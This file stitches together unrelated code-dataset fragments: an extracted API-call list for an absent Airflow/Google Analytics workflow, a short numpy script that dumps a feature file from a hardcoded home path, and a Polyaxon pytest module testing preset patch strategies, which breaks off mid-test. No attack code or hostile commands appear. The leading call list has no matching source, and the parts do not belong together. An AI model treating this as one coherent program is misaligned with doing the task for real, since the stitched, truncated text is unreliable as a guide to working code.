[((8880, 8939), 'airflow.hooks.base.BaseHook.get_connection', 'BaseHook.get_connection', (['AirflowConns.OAEBU_SERVICE_ACCOUNT'], {}), '(AirflowConns.OAEBU_SERVICE_ACCOUNT)\n', (8903, 8939), False, 'from airflow.hooks.base import BaseHook\n'), ((9021, 9122), 'oauth2client.service_account.ServiceAccountCredentials.from_json_keyfile_dict', 'ServiceAccountCredentials.from_json_keyfile_dict', (['oaebu_account_conn.extra_dejson'], {'scopes': 'scopes'}), '(oaebu_account_conn.\n extra_dejson, scopes=scopes)\n', (9069, 9122), False, 'from oauth2client.service_account import ServiceAccountCredentials\n'), ((9165, 9240), 'googleapiclient.discovery.build', 'build', (['"""analyticsreporting"""', '"""v4"""'], {'credentials': 'creds', 'cache_discovery': '(False)'}), "('analyticsreporting', 'v4', credentials=creds, cache_discovery=False)\n", (9170, 9240), False, 'from googleapiclient.discovery import Resource, build\n'), ((2588, 2657), 'os.path.join', 'os.path.join', (['self.transform_folder', 'f"""{self.dag_id_prefix}.jsonl.gz"""'], {}), "(self.transform_folder, f'{self.dag_id_prefix}.jsonl.gz')\n", (2600, 2657), False, 'import os\n'), ((3215, 3303), 'observatory.platform.utils.workflow_utils.add_partition_date', 'add_partition_date', (['results', 'self.release_date', 'bigquery.TimePartitioningType.MONTH'], {}), '(results, self.release_date, bigquery.\n TimePartitioningType.MONTH)\n', (3233, 3303), False, 'from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id\n'), ((4122, 4151), 'pendulum.datetime', 'pendulum.datetime', (['(2018)', '(1)', '(1)'], {}), '(2018, 1, 1)\n', (4139, 4151), False, 'import pendulum\n'), ((4263, 4286), 'oaebu_workflows.config.schema_folder', 'default_schema_folder', ([], {}), '()\n', (4284, 4286), True, 'from oaebu_workflows.config import schema_folder as default_schema_folder\n'), ((7359, 7452), 'logging.info', 'logging.info', (['f"""Start date: {start_date}, end date:{end_date}, release date: {end_date}"""'], {}), "(\n f'Start date: {start_date}, end date:{end_date}, release date: {end_date}')\n", (7371, 7452), False, 'import logging\n'), ((3331, 3377), 'observatory.platform.utils.file_utils.list_to_jsonl_gz', 'list_to_jsonl_gz', (['self.transform_path', 'results'], {}), '(self.transform_path, results)\n', (3347, 3377), False, 'from observatory.platform.utils.file_utils import list_to_jsonl_gz\n'), ((5806, 5856), 'observatory.platform.utils.workflow_utils.make_dag_id', 'make_dag_id', (['self.DAG_ID_PREFIX', 'organisation.name'], {}), '(self.DAG_ID_PREFIX, organisation.name)\n', (5817, 5856), False, 'from observatory.platform.utils.workflow_utils import add_partition_date, make_dag_id\n'), ((7332, 7349), 'datetime.timedelta', 'timedelta', ([], {'days': '(1)'}), '(days=1)\n', (7341, 7349), False, 'from datetime import timedelta\n'), ((8012, 8140), 'airflow.exceptions.AirflowException', 'AirflowException', (['f"""View ID and/or pagepath regex is not set in \'extra\' of telescope, extra example: {expected_extra}"""'], {}), '(\n f"View ID and/or pagepath regex is not set in \'extra\' of telescope, extra example: {expected_extra}"\n )\n', (8028, 8140), False, 'from airflow.exceptions import AirflowException, AirflowSkipException\n'), ((8589, 8660), 'airflow.exceptions.AirflowSkipException', 'AirflowSkipException', (['"""No Google Analytics data available to download."""'], {}), "('No Google Analytics data available to download.')\n", (8609, 8660), False, 'from airflow.exceptions import AirflowException, AirflowSkipException\n'), ((3506, 3681), 
'logging.info', 'logging.info', (['"""No data available. Google Analytics data is only available for 26 months, see https://support.google.com/analytics/answer/7667196?hl=en for more info"""'], {}), "(\n 'No data available. Google Analytics data is only available for 26 months, see https://support.google.com/analytics/answer/7667196?hl=en for more info'\n )\n", (3518, 3681), False, 'import logging\n'), ((3432, 3453), 'pendulum.today', 'pendulum.today', (['"""UTC"""'], {}), "('UTC')\n", (3446, 3453), False, 'import pendulum\n')]
|
import numpy as np
test = np.load('/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy', encoding="latin1", allow_pickle=True)  # load the feature-info file
doc = open('contrast9.txt', 'a')  # open an output file in append mode, written to below
print(test, file=doc)  # write the printed contents into the file
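# (Editorial addition) close the handle so buffered output is flushed to disk
doc.close()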
|
[
"numpy.load"
] |
[((24, 183), 'numpy.load', 'np.load', (['"""/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy"""'], {'encoding': '"""latin1"""', 'allow_pickle': '(True)'}), "(\n '/home/ubuntu/hzy/pythia/data/m4c_textvqa_ocr_en_frcn_features/train_images/f441f29812b385ad_info.npy'\n , encoding='latin1', allow_pickle=True)\n", (31, 183), True, 'import numpy as np\n')]
|
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from polyaxon import pkg, types
from polyaxon.config_reader.utils import deep_update
from polyaxon.containers.names import MAIN_JOB_CONTAINER
from polyaxon.polyaxonfile import OperationSpecification
from polyaxon.polyflow import V1Component, V1EventKind, V1Operation, V1RunKind
from polyaxon.schemas.patch_strategy import V1PatchStrategy
from polyaxon.utils.tz_utils import now
from tests.utils import BaseTestCase
@pytest.mark.polyaxonfile_mark
class TestPatchSpecifications(BaseTestCase):
DEFAULT_INT_VALUE = 2
DEFAULT_DT_VALUE = now().isoformat()
DEFAULT_STR_VALUE = "test"
PATCH_INT_VALUE = 13
PATCH_DT_VALUE = now().isoformat()
PATCH_STR_VALUE = "patch"
def get_empty_operation(self):
return OperationSpecification.read(
{"version": pkg.SCHEMA_VERSION, "hubRef": "test"}
)
def get_full_operation(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": self.DEFAULT_STR_VALUE,
"description": self.DEFAULT_STR_VALUE,
"tags": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"presets": [self.DEFAULT_STR_VALUE],
"queue": "{}/{}".format(self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE),
"cache": {
"disable": False,
"ttl": self.DEFAULT_INT_VALUE,
},
"termination": {
"maxRetries": self.DEFAULT_INT_VALUE,
"ttl": self.DEFAULT_INT_VALUE,
"timeout": self.DEFAULT_INT_VALUE,
},
"plugins": {
"auth": False,
"shm": False,
"collectLogs": False,
"collectArtifacts": False,
"collectResources": False,
},
"build": {
"params": {
"patch-key1": {"value": "{}2".format(self.DEFAULT_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.DEFAULT_STR_VALUE,
"git": {"revision": self.DEFAULT_STR_VALUE},
}
],
},
"hubRef": self.DEFAULT_STR_VALUE,
},
"hooks": [
{
"hubRef": "{}1".format(self.DEFAULT_STR_VALUE),
"trigger": "succeeded",
"connection": "{}1".format(self.DEFAULT_STR_VALUE),
},
{
"connection": "{}2".format(self.DEFAULT_STR_VALUE),
"hubRef": "{}2".format(self.DEFAULT_STR_VALUE),
},
],
"params": {
"patch-key1": {"value": "{}2".format(self.DEFAULT_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.DEFAULT_STR_VALUE,
"git": {"revision": self.DEFAULT_STR_VALUE},
}
],
"connections": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"container": {
"resources": {"requests": {"cpu": self.DEFAULT_INT_VALUE}}
},
"environment": {
"nodeSelector": {"polyaxon": "core"},
"serviceAccountName": self.DEFAULT_STR_VALUE,
"imagePullSecrets": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
},
},
"schedule": {
"kind": "cron",
"cron": "0 0 * * *",
"startAt": self.DEFAULT_DT_VALUE,
"endAt": self.DEFAULT_DT_VALUE,
},
"events": [
{
"kinds": [V1EventKind.RUN_STATUS_SCHEDULED],
"ref": "{}1".format(self.DEFAULT_STR_VALUE),
},
{
"kinds": [V1EventKind.RUN_STATUS_SCHEDULED],
"ref": "{}2".format(self.DEFAULT_STR_VALUE),
},
],
"joins": [
{
"query": "{}1".format(self.DEFAULT_STR_VALUE),
"sort": "{}1".format(self.DEFAULT_STR_VALUE),
"params": {
"u": {"value": "{}1".format(self.DEFAULT_STR_VALUE)},
},
},
{
"query": "{}2".format(self.DEFAULT_STR_VALUE),
"sort": "{}2".format(self.DEFAULT_STR_VALUE),
"params": {
"v": {
"value": "{}2".format(self.DEFAULT_STR_VALUE),
"contextOnly": True,
},
},
},
],
"matrix": {
"concurrency": self.DEFAULT_INT_VALUE,
"kind": "mapping",
"values": [
{"a": self.DEFAULT_INT_VALUE},
{"b": self.DEFAULT_INT_VALUE},
],
},
"dependencies": [
"{}1".format(self.DEFAULT_STR_VALUE),
"{}2".format(self.DEFAULT_STR_VALUE),
],
"trigger": "all_succeeded",
"conditions": self.DEFAULT_STR_VALUE,
"skipOnUpstreamSkip": True,
"hubRef": self.DEFAULT_STR_VALUE,
}
)
def get_full_operation_with_component(self):
operation = self.get_full_operation()
config_dict = {
"inputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
operation.component = V1Component.from_dict(config_dict)
return operation
def get_full_preset(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": self.PATCH_STR_VALUE,
"isPreset": True,
"description": self.PATCH_STR_VALUE,
"tags": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"presets": [self.PATCH_STR_VALUE],
"queue": "{}/{}".format(self.PATCH_STR_VALUE, self.PATCH_STR_VALUE),
"cache": {
"disable": True,
"ttl": self.PATCH_INT_VALUE,
},
"termination": {
"maxRetries": self.PATCH_INT_VALUE,
"ttl": self.PATCH_INT_VALUE,
"timeout": self.PATCH_INT_VALUE,
},
"plugins": {
"auth": True,
"shm": True,
"collectLogs": True,
"collectArtifacts": True,
"collectResources": True,
},
"build": {
"params": {
"patch-key1": {"value": "{}2".format(self.PATCH_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.PATCH_STR_VALUE)},
},
"runPatch": {
"init": [
{
"connection": self.PATCH_STR_VALUE,
"git": {"revision": self.PATCH_STR_VALUE},
}
],
},
"hubRef": self.PATCH_STR_VALUE,
},
"hooks": [
{
"hubRef": "{}1".format(self.PATCH_STR_VALUE),
"trigger": "succeeded",
"connection": "{}1".format(self.PATCH_STR_VALUE),
},
{
"connection": "{}1".format(self.PATCH_STR_VALUE),
"hubRef": "{}2".format(self.PATCH_STR_VALUE),
},
],
"params": {
"patch-key1": {"value": "{}2".format(self.PATCH_STR_VALUE)},
"patch-key2": {"value": "{}1".format(self.PATCH_STR_VALUE)},
},
"runPatch": {
"init": [
{"connection": self.PATCH_STR_VALUE, "git": {"revision": "dev"}}
],
"connections": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"container": {
"resources": {
"requests": {
"cpu": self.PATCH_INT_VALUE,
"memory": self.PATCH_INT_VALUE,
}
}
},
"environment": {
"nodeSelector": {"polyaxon-patch": "core"},
"serviceAccountName": self.PATCH_STR_VALUE,
"imagePullSecrets": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
},
},
"schedule": {"kind": "datetime", "startAt": self.PATCH_DT_VALUE},
"events": [
{
"kinds": [V1EventKind.RUN_STATUS_DONE],
"ref": self.PATCH_STR_VALUE,
},
{
"kinds": [V1EventKind.RUN_STATUS_DONE],
"ref": self.PATCH_STR_VALUE,
},
],
"joins": [
{
"query": self.PATCH_STR_VALUE,
"sort": self.PATCH_STR_VALUE,
"params": {
"u": {"value": self.PATCH_STR_VALUE},
},
},
{
"query": self.PATCH_STR_VALUE,
"sort": self.PATCH_STR_VALUE,
"params": {
"x": {"value": self.PATCH_STR_VALUE, "contextOnly": True},
},
},
],
"matrix": {
"concurrency": self.PATCH_INT_VALUE,
"kind": "mapping",
"values": [
{"a": self.PATCH_INT_VALUE},
{"c": self.PATCH_INT_VALUE},
],
},
"dependencies": [
"{}1".format(self.PATCH_STR_VALUE),
"{}2".format(self.PATCH_STR_VALUE),
],
"trigger": "all_succeeded",
"conditions": "",
"skipOnUpstreamSkip": True,
}
)
def get_empty_preset(self):
return OperationSpecification.read(
{
"version": pkg.SCHEMA_VERSION,
"name": None,
"isPreset": True,
"description": "",
"tags": [],
"presets": [],
"queue": "",
"cache": {},
"termination": {},
"plugins": {},
"build": None,
"hooks": [],
"params": {},
"runPatch": {
"init": [],
"connections": [],
"container": {},
"environment": {
"nodeSelector": {},
"serviceAccountName": "",
"imagePullSecrets": [],
},
},
"schedule": None,
"events": [],
"joins": [],
"matrix": None,
"dependencies": [],
"trigger": None,
"conditions": None,
"skipOnUpstreamSkip": None,
}
)
def test_patch_replace_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.REPLACE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_replace_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_replace_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.REPLACE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict.pop("name") == operation.name
assert result_dict.pop("trigger") == operation.trigger
assert result_dict.pop("conditions") == operation.conditions
assert result_dict.pop("skipOnUpstreamSkip") == operation.skip_on_upstream_skip
assert result_dict.pop("schedule") == operation.schedule.to_dict()
assert result_dict.pop("conditions", None) is None
assert result_dict.pop("matrix") == operation.matrix.to_dict()
assert result_dict.pop("cache") == operation.cache.to_dict()
assert result_dict.pop("plugins") == operation.plugins.to_dict()
assert result_dict.pop("termination") == operation.termination.to_dict()
assert result_dict.pop("build", None) is not None
expected = preset.to_dict()
expected.pop("isPreset")
expected.pop("cache")
expected.pop("plugins")
expected.pop("termination")
assert result_dict == expected
def test_patch_replace_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.REPLACE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_isnull_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.ISNULL
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
assert result.to_dict() == operation.to_dict()
def test_patch_isnull_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.ISNULL)
assert result.to_dict() == operation.to_dict()
def test_patch_post_merge_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.POST_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_post_merge_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_post_merge_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.POST_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict["description"] == ""
result_dict["description"] = self.DEFAULT_STR_VALUE
assert result_dict["queue"] == ""
result_dict["queue"] = "{}/{}".format(
self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE
)
result_dict["presets"] = [self.DEFAULT_STR_VALUE]
# Since there's no component to validate the runPatch section it stays the same
assert result_dict == operation.to_dict()
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
assert result_dict["description"] == ""
result_dict["description"] = self.DEFAULT_STR_VALUE
assert result_dict["queue"] == ""
result_dict["queue"] = "{}/{}".format(
self.DEFAULT_STR_VALUE, self.DEFAULT_STR_VALUE
)
# Run patch was validated and merged
assert result_dict["runPatch"]["environment"]["serviceAccountName"] == ""
result_dict["runPatch"]["environment"][
"serviceAccountName"
] = operation.run_patch["environment"]["serviceAccountName"]
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert result_dict == operation.to_dict()
def test_patch_post_merge_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
expected = preset.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
expected.pop("isPreset")
expected["tags"] = operation.tags + expected["tags"]
expected["presets"] = operation.presets + expected["presets"]
expected["hooks"] = [i.to_dict() for i in operation.hooks] + expected["hooks"]
expected["dependencies"] = operation.dependencies + expected["dependencies"]
expected["events"] = [i.to_dict() for i in operation.events] + expected[
"events"
]
expected["joins"] = [i.to_dict() for i in operation.joins] + expected["joins"]
expected["matrix"]["values"] = (
operation.matrix.values + expected["matrix"]["values"]
)
# Since there's no component to validate the runPatch section it stays the same
expected["runPatch"] = operation.run_patch
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict == expected
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_full_preset()
expected = preset.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.POST_MERGE)
result_dict = result.to_dict()
expected.pop("isPreset")
expected["tags"] = operation.tags + expected["tags"]
expected["presets"] = operation.presets + expected["presets"]
expected["hooks"] = [i.to_dict() for i in operation.hooks] + expected["hooks"]
expected["dependencies"] = operation.dependencies + expected["dependencies"]
expected["events"] = [i.to_dict() for i in operation.events] + expected[
"events"
]
expected["joins"] = [i.to_dict() for i in operation.joins] + expected["joins"]
expected["matrix"]["values"] = (
operation.matrix.values + expected["matrix"]["values"]
)
# Run patch was validated and merged
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert (
result_dict["runPatch"]["connections"]
== operation.run_patch["connections"] + expected["runPatch"]["connections"]
)
result_dict["runPatch"]["connections"] = expected["runPatch"]["connections"]
assert (
result_dict["runPatch"]["init"]
== operation.run_patch["init"] + expected["runPatch"]["init"]
)
result_dict["runPatch"]["init"] = expected["runPatch"]["init"]
assert (
result_dict["runPatch"]["environment"]["imagePullSecrets"]
== operation.run_patch["environment"]["imagePullSecrets"]
+ expected["runPatch"]["environment"]["imagePullSecrets"]
)
result_dict["runPatch"]["environment"]["imagePullSecrets"] = expected[
"runPatch"
]["environment"]["imagePullSecrets"]
assert result_dict["runPatch"]["environment"]["nodeSelector"] == {
**operation.run_patch["environment"]["nodeSelector"],
**expected["runPatch"]["environment"]["nodeSelector"],
}
result_dict["runPatch"]["environment"]["nodeSelector"] = expected["runPatch"][
"environment"
]["nodeSelector"]
assert result_dict.pop("hubRef") == operation.hub_ref
assert result_dict.pop("component") == operation.component.to_dict()
expected["runPatch"]["container"].pop("name")
assert result_dict == expected
def test_patch_pre_merge_empty_values_with_empty_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.PRE_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_empty_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_pre_merge_empty_values_with_full_preset(self):
operation = self.get_empty_operation()
tmp_operation = self.get_empty_operation()
preset = self.get_full_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict.pop("hubRef") == operation.hub_ref
expected = preset.to_dict()
expected.pop("isPreset")
assert result_dict == expected
def test_patch_pre_merge_full_values_with_empty_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
result = tmp_operation.patch(
V1Operation(is_preset=True), strategy=V1PatchStrategy.PRE_MERGE
)
assert result.to_dict() == operation.to_dict()
tmp_operation = self.get_full_operation()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
# Since there's no component to validate the runPatch section it stays the same
assert result_dict == operation.to_dict()
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_empty_preset()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
# Run patch was validated and merged
assert result_dict == operation.to_dict()
def test_patch_pre_merge_full_values_with_full_preset(self):
operation = self.get_full_operation()
tmp_operation = self.get_full_operation()
preset = self.get_full_preset()
preset_dict = preset.to_dict()
expected = operation.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
expected["tags"] = preset_dict["tags"] + operation.tags
expected["presets"] = preset_dict["presets"] + operation.presets
expected["hooks"] = preset_dict["hooks"] + [
i.to_dict() for i in operation.hooks
]
expected["dependencies"] = preset_dict["dependencies"] + operation.dependencies
expected["events"] = preset_dict["events"] + [
i.to_dict() for i in operation.events
]
expected["joins"] = preset_dict["joins"] + [
i.to_dict() for i in operation.joins
]
expected["matrix"]["values"] = (
preset_dict["matrix"]["values"] + operation.matrix.values
)
assert result_dict == expected
operation = self.get_full_operation_with_component()
tmp_operation = self.get_full_operation_with_component()
preset = self.get_full_preset()
preset_dict = preset.to_dict()
expected = operation.to_dict()
result = tmp_operation.patch(preset, strategy=V1PatchStrategy.PRE_MERGE)
result_dict = result.to_dict()
expected["tags"] = preset_dict["tags"] + operation.tags
expected["presets"] = preset_dict["presets"] + operation.presets
expected["hooks"] = preset_dict["hooks"] + [
i.to_dict() for i in operation.hooks
]
expected["dependencies"] = preset_dict["dependencies"] + operation.dependencies
expected["events"] = preset_dict["events"] + [
i.to_dict() for i in operation.events
]
expected["joins"] = preset_dict["joins"] + [
i.to_dict() for i in operation.joins
]
expected["matrix"]["values"] = (
preset_dict["matrix"]["values"] + operation.matrix.values
)
# Run patch was validated and merged
assert result_dict["runPatch"]["container"].pop("name") == MAIN_JOB_CONTAINER
assert result_dict["runPatch"]["container"].pop("resources") == deep_update(
preset_dict["runPatch"]["container"]["resources"],
expected["runPatch"]["container"]["resources"],
)
result_dict["runPatch"]["container"]["resources"] = expected["runPatch"][
"container"
]["resources"]
assert (
result_dict["runPatch"]["connections"]
== preset_dict["runPatch"]["connections"]
+ expected["runPatch"]["connections"]
)
result_dict["runPatch"]["connections"] = expected["runPatch"]["connections"]
assert (
result_dict["runPatch"]["init"]
== preset_dict["runPatch"]["init"] + expected["runPatch"]["init"]
)
result_dict["runPatch"]["init"] = expected["runPatch"]["init"]
assert (
result_dict["runPatch"]["environment"]["imagePullSecrets"]
== preset_dict["runPatch"]["environment"]["imagePullSecrets"]
+ expected["runPatch"]["environment"]["imagePullSecrets"]
)
result_dict["runPatch"]["environment"]["imagePullSecrets"] = expected[
"runPatch"
]["environment"]["imagePullSecrets"]
assert result_dict["runPatch"]["environment"]["nodeSelector"] == {
**preset_dict["runPatch"]["environment"]["nodeSelector"],
**expected["runPatch"]["environment"]["nodeSelector"],
}
result_dict["runPatch"]["environment"]["nodeSelector"] = expected["runPatch"][
"environment"
]["nodeSelector"]
assert result_dict == expected
class BaseTestApplyPreset(BaseTestCase):
def setUp(self):
super().setUp()
op_spec = OperationSpecification.read(
{
"version": 1.1,
"kind": "operation",
"name": "foo",
"description": "a description",
"tags": ["tag1", "tag2"],
"trigger": "all_succeeded",
"component": {
"name": "build-template",
"tags": ["tag1", "tag2"],
"run": {
"kind": V1RunKind.JOB,
"container": {"image": "test"},
"init": [{"connection": "foo", "git": {"revision": "dev"}}],
},
},
}
)
self.compiled_operation = OperationSpecification.compile_operation(op_spec)
self.preset = {"runPatch": {}, "patchStrategy": V1PatchStrategy.POST_MERGE}
@pytest.mark.polyaxonfile_mark
class TestApplyPresetEnvironment(BaseTestApplyPreset):
def assert_environment(self, environment1, environment2):
self.preset["runPatch"]["environment"] = environment1
assert self.compiled_operation.run.environment is None
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment1
# Updating the preset
self.preset["patchStrategy"] = V1PatchStrategy.REPLACE
self.preset["runPatch"]["environment"] = environment2
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
def test_compile_injects_labels(self):
environment1 = {"labels": {"label1": "value1"}}
environment2 = {"labels": {"label1": "value11"}}
self.assert_environment(environment1, environment2)
# Updating the preset
environment3 = {"labels": {"label2": "value2"}}
self.preset["runPatch"]["environment"] = environment3
env = self.compiled_operation.run.environment.to_dict()
assert env == environment2
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == {"labels": {"label2": "value2"}}
def test_compile_injects_annotations(self):
environment1 = {"annotations": {"anno1": "value1"}}
environment2 = {"annotations": {"anno1": "value11"}}
self.assert_environment(environment1, environment2)
# Updating the preset
environment3 = {"annotations": {"anno2": "value2"}}
self.preset["runPatch"]["environment"] = environment3
assert (
OperationSpecification.apply_preset(
config=self.compiled_operation,
preset=self.preset,
)
== self.compiled_operation
)
assert self.compiled_operation.run.environment is not None
env = self.compiled_operation.run.environment.to_dict()
assert env == {"annotations": {"anno2": "value2"}}
def test_compile_injects_node_selector(self):
environment1 = {"nodeSelector": {"plx": "selector1"}}
environment2 = {"nodeSelector": {"plx": "selector2"}}
self.assert_environment(environment1, environment2)
def test_compile_injects_affinity(self):
environment1 = {"affinity": {"podAffinity": {}}}
environment2 = {"affinity": {"podAffinity": {"foo": "bar"}}}
self.assert_environment(environment1, environment2)
def test_compile_injects_tolerations(self):
environment1 = {"tolerations": [{"key": "key1", "operator": "Exists"}]}
environment2 = {"tolerations": [{"key": "key2", "operator": "NotExists"}]}
